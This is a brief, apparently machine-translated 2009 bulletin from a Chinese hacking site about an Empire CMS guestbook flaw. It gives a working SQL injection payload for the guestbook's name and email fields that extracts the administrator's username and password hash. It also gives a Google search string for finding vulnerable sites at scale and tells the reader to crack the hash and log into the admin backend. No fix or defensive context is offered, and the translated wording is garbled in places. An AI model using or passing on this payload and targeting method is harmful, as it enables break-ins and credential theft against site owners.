Empire CMS0day----the success rate of the high Oh-vulnerability warning-the black bar safety net

ID MYHACK58:62200923854
Type myhack58
Reporter 佚名
Modified 2009-07-13T00:00:00


Find used Empire CMS station,the site behind a directly applied:e/tool/gbook/? bid=1 Out is Empire CMS the guestbook,in the name of writing:缞\ Contact email at:,1,1,1,(select concat(username,0x5f,password,0x5f,rnd) from phome_enewsuser where userid=1),1,1,1,0,0,0)/* After the submission of the burst account password

Test method: using the google search keyword inurl:e/tool/gbook/? bid=1, then in accordance with the above manner message, to display the results that broke the administrator account and password for the md5 value, the crack password login in the background.